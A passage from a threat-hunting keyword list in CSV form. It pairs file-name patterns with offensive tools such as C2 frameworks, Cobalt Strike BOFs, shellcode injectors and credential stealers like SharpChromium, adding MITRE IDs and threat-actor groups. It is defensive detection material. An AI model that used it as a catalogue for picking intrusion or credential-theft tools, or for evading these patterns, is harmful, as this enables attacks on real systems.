is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_NetworkShareDiscovery_PowerView.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_PermissionGroupsDiscovery_PowerView.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_QueryRegistry_GetDotNetVersions.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet 
penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_QueryRegistry_GetRDPPort.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_RemoteSystemDiscovery_GetDomainIPAddress.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_RemoteSystemDiscovery_GetNetComputer.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - 
T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_RemoteSystemDiscovery_GetNetDomain.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_RemoteSystemDiscovery_GetNetDomainController.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_SecuritySoftwareDiscovery_ListAVByTasklist.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_SystemNetworkConnectionsDiscovery_GetPublicIP.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_SystemUserDiscovery_GetLastLoggedOn.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_SystemUserDiscovery_GetLoggedOnLocal.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Disctopia Backdoor*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","0","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*disctopia-c2.git*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*disctopia-c2-main.zip*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*DiskCryptor Device Installation Disk*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*DiskCryptor driver*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*DISKCRYPTOR_MUTEX*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption 
solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*diskcryptor2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*DiskCryptor-master*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*diskshadow list shadows all*","greyware_tool_keyword","diskshadow","List shadow copies using diskshadow","T1059.003 - T1059.001 - T1005","TA0002 - TA0005 - TA0010","N/A","N/A","discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*dist*_brc4.x64.o*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*dist*_brc4.x86.o*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*dist/agent.upx.exe*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*dist/agent.windows.exe*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*dist/nanorobeus_cs.*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*dist/shadow.exe*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*dist\shadow.exe*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*ditty/ditty.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z" +"*djhohnstein/SharpChromium*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved 
logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" +"*dl.wireshark.org*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*dlink_central_wifimanager_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*dlink_sharecenter_cmd_exec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*dlink_telnet_backdoor_userpass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*dll* [HIJACKABLE]*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. 
Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*dll\reflective_dll.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","0","N/A","10",,"N/A",,, +"*dll_generator.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*dll_hijack_detect_x64*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*dll_hijack_detect_x86*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*dll_hijack_hunter*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z"
+"*DLL_Imports_BOF*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. 
optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z"
+"*dll_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*dll_spawn_cmd.cpp*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z"
+"*DLL_TO_HIJACK_WIN10*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z"
+"*DllCanUnloadNow*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,,
+"*dllexploit.*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z"
+"*DllExport -*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik 
Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z"
+"*DLLHijackAuditKit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*DLLHijackAuditKit.zip*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*DLL-Hijack-Search-Order-BOF*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z"
